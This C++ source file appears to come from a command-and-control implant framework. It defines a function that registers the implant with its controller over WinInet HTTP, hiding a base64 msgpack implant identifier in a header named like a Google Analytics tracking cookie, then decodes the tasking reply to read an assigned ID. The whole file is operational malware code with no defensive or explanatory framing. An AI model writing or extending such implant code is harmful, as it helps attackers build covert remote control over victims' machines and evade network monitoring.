[# 
Name: WinInet HTTP register functions. 

Explanation:... 

Required Keys:

 - data transform keys (not implemented)
#]


#include <vector>
#include <iostream>
#include "../protocols/http_wininet/http.h"
#include "../data/msgpack/msgpack.h"
#include "../protocols/json/json.h"

std::string register_implant() {
    std::vector<uint8_t> http_response_buffer;

    // Define headers (No \r\n needed)
    //do this dynamically later
    std::vector<std::wstring> headers = {
        //msgpack -> b64: {"implant_uuid":"00000-00...."}
        L"utmcc: gaxpbXBsYW50X3V1aWTZIzAwMDAwMDAwLTAwMDAtMDAwMC0wMDAwLTAwMDAwMDAwMDAw"
    };

    bool http_response_status = HTTP_GET(headers, http_response_buffer);

    if (http_response_status) {
        std::cout << "Success! Bytes read: " << http_response_buffer.size() << std::endl;

        //then transform and pull out data we need
        //placeholer id" 019bbe19-2c0e-7ee1-a81a-78d7e1a97ac0

        //right now, prof is set to print, so just task -> from msgpack, then extract ID out from there.

        nlohmann::json task_data = decode_msgpack_task(http_response_buffer);

        //return task_data["implant_uuid"];
        //return "019bbe19-2c0e-7ee1-a81a-78d7e1a97ac0"; //placeholder for debugging
        std::cout << task_data["implant_uuid"] << std::endl;
        if (task_data.contains("implant_uuid") && task_data["implant_uuid"].is_string()) {
            return task_data["implant_uuid"];
        }
        return "";
    }
    else {
        std::cerr << "Request failed." << std::endl;
    }

    return "";
}